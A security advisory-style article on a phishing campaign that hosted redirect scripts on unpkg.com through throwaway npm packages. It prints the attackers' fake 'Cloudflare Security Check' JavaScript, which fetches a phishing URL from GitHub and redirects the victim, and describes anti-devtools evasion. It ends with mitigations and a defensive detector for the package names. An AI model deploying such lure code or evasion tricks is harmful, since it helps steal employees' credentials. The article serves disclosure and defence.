In October 2025, security researchers uncovered an unprecedented phishing campaign that weaponizes the npm ecosystem—not by infecting developers during package installation, but by abusing the unpkg.com CDN as a disposable hosting platform for malicious JavaScript.
By seeding over 175 throwaway npm packages, attackers have turned a trusted open source delivery network into a large-scale phishing infrastructure targeting enterprise employees across Europe’s industrial, technology, and energy sectors.
Rather than embedding malware in popular modules, adversaries created hundreds of ephemeral packages matching the pattern redirect-[a-z0-9]{6}.
Each package contains a minimal JavaScript file named beamglea.js and crafted HTML “business document” lures. When a victim opens one of these HTML files in a browser, it automatically loads the malicious script directly from unpkg.com via a script tag whose src points at the throwaway package on the CDN.
The loaded script immediately redirects the user to a credential-harvesting site. To enhance phishing effectiveness, the URL fragment passes the victim’s email address so the form appears pre-filled, providing a strong trust cue while evading server logs.
Campaign Execution
Initial public traces of this infrastructure appeared on September 24, 2025. On October 9, Socket disclosed 175 malicious packages under the codename “Beamglea,” impacting more than 135 organizations.
A follow-up analysis by Snyk on October 10 uncovered a related cluster using mad-x.x.x.x.x.x naming, suggesting either a copycat operation or parallel research by the same threat actor.
The “mad” packages target a broader audience by masquerading as a fake “Cloudflare Security Check” page. When the user checks an “I am not a robot” box, anti-devtools logic and frame-busting techniques run before fetching a remote GitHub-hosted file containing the attacker’s payload URL.

Key features include disabling right-click, blocking F12 and common inspection shortcuts, and blanking the page if developer tools are detected.
Upon successful verification, the script reads the URL from the GitHub file and redirects the parent window to the phishing page.
```javascript
// Attacker's "Cloudflare Security Check" lure: runs when the fake "I am not a robot" box is ticked
document.querySelector('.checkbox-container').addEventListener('change', function() {
  if (!this.checked) return;
  // Simulate verification delay
  setTimeout(() => {
    // Remote GitHub-hosted text file holding the current phishing URL (path elided in the original)
    const urlFile = "https://raw.githubusercontent.com/.../mad4.txt";
    fetch(urlFile, { method: 'GET', cache: 'no-store' })
      .then(res => res.text())
      .then(text => {
        const target = text.trim();
        // Only follow http(s) URLs
        if (!/^https?:\/\//i.test(target)) return;
        try {
          // Redirect the top-level window so the victim leaves any framing page
          window.top.location.href = target;
        } catch (e) {
          // Cross-origin frame access failed: redirect the current window instead
          window.location.href = target;
        }
      });
  }, 1000 + Math.random() * 1000);
});
```
Mitigations
Although this campaign does not compromise package install processes, it highlights the expanding threat landscape within the open source software supply chain. Organizations should:
- Treat any external script loads via unpkg.com as high risk, especially those embedded in email-delivered HTML files.
- Implement email gateway filters to strip or quarantine HTML attachments referencing unpkg.com.
- Educate employees about phishing tactics that leverage trusted CDNs and pre-filled credential forms.
- Monitor outbound web requests for patterns matching the redirect-* and mad-* naming conventions.
- Collaborate with npm registry maintainers and CDN operators to flag and remove throwaway packages at scale.
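The gateway-filter and outbound-monitoring recommendations above can be implemented as a small check that extracts script loads from an HTML attachment and flags those pointing at unpkg.com packages named like the campaign's throwaway packages. This is an added example, not code from the article or from Socket or Snyk; it assumes the unpkg URL layout unpkg.com/<package>[@<version>]/<path>, interprets the mad-x.x.x.x.x.x naming as "mad-" followed by dot-separated tokens, and uses a constructed sample lure.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Package names used by the campaign: redirect-<6 alnum> (from the article) and
# mad-x.x.x.x.x.x, assumed here to mean "mad-" plus dot-separated tokens.
SUSPECT_PACKAGE = re.compile(r"^(redirect-[a-z0-9]{6}|mad-[a-z0-9]+(\.[a-z0-9]+)+)$")
UNPKG_HOSTS = {"unpkg.com", "www.unpkg.com"}


def unpkg_package(url):
    """Return the npm package name if url is an unpkg.com load, else None."""
    p = urlparse(url)
    if p.scheme not in ("http", "https") or p.hostname not in UNPKG_HOSTS:
        return None
    first = p.path.lstrip("/").split("/", 1)[0]  # "<pkg>" or "<pkg>@<version>"
    return first.split("@", 1)[0] or None        # unscoped packages only


def is_suspect(url):
    """True when the URL loads an unpkg package matching the campaign naming."""
    name = unpkg_package(url)
    return bool(name and SUSPECT_PACKAGE.match(name))


class _ScriptSrcCollector(HTMLParser):
    """Collect every <script src=...> value from an HTML document."""
    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.srcs.extend(v for k, v in attrs if k == "src" and v)


def suspect_script_loads(html_text):
    """Script src URLs in an HTML attachment that match the campaign pattern."""
    collector = _ScriptSrcCollector()
    collector.feed(html_text)
    return [s for s in collector.srcs if is_suspect(s)]


# Constructed sample lure resembling the article's description (not a real sample).
SAMPLE_LURE = """<html><body><h1>Invoice</h1>
<script src="https://unpkg.com/lodash@4.17.21/lodash.min.js"></script>
<script src="https://unpkg.com/redirect-ab12cd/beamglea.js"></script>
</body></html>"""

if __name__ == "__main__":
    for src in suspect_script_loads(SAMPLE_LURE):
        print("suspect unpkg load:", src)
```

The same `is_suspect` check can be applied to URLs pulled from proxy or web-gateway logs to cover the outbound-monitoring recommendation.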
As attackers continue probing new methods to weaponize open source infrastructure, defenders must extend supply chain vigilance beyond installation-based threats and secure every step of the software delivery and consumption lifecycle.